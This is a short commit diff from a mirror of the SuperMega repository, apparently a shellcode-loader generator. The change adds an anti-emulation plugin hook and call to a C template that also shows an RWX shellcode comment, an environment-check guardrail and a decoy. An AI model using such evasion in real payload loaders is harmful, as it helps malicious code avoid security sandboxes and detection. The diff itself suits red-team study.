mirror of
https://github.com/dobin/SuperMega
synced 2026-06-03 01:27:11 +00:00
feature: antiemulation in templates
This commit is contained in:
@@ -15,6 +15,9 @@ char *supermega_payload;
|
||||
* will set it to RWX (safe to run shellcodes, opsec-unsafe)
|
||||
*/
|
||||
|
||||
{{plugin_antiemulation}}
|
||||
|
||||
|
||||
int main()
|
||||
{
|
||||
// Execution Guardrail: Env Check
|
||||
@@ -29,6 +32,9 @@ int main()
|
||||
return 6;
|
||||
}
|
||||
|
||||
// Depends on plugin_antiemulation
|
||||
antiemulation();
|
||||
|
||||
// Decoy
|
||||
//WinExec("C:\\windows\\system32\\notepad.exe", 1);
|
||||
|
||||
|
||||
Reference in New Issue
Block a user